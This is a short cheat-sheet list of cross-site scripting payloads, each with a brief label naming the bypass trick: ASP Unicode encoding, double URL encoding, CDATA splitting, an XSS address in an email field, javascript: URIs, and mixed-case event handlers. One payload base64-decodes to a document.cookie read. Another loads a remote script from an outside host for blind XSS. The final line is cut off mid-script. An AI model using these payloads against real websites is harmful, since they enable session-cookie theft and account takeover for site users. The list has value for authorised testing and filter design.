%u003Cscript%u003Eprompt%u0028303%u0029%u003C/script%u003E For ASP Encoding
```%253Cscript%253Ealert(1)%253C%252Fscript%253E```` double url enc
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]> XML Reflectionxss
"onauxclick=alert(1);//
javascript://%250aalert(1) where :// is required after protocol
"\"><s>test"@gmail.com XSS in email id
javascript:eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='));
<imG/sRc=l oNerrOr=(prompt)() x> "><script src=https://a007.xss.ht></script> Blind
<style onload=alert(1)> hack the planet z <script>confirm(1)</script> HTML Encoding “=””’><script></script> <script>var xss = '';f=document.forms;for(i=0;i GET Hidden Fields| XSS (((confirm)))``</scRipt x> |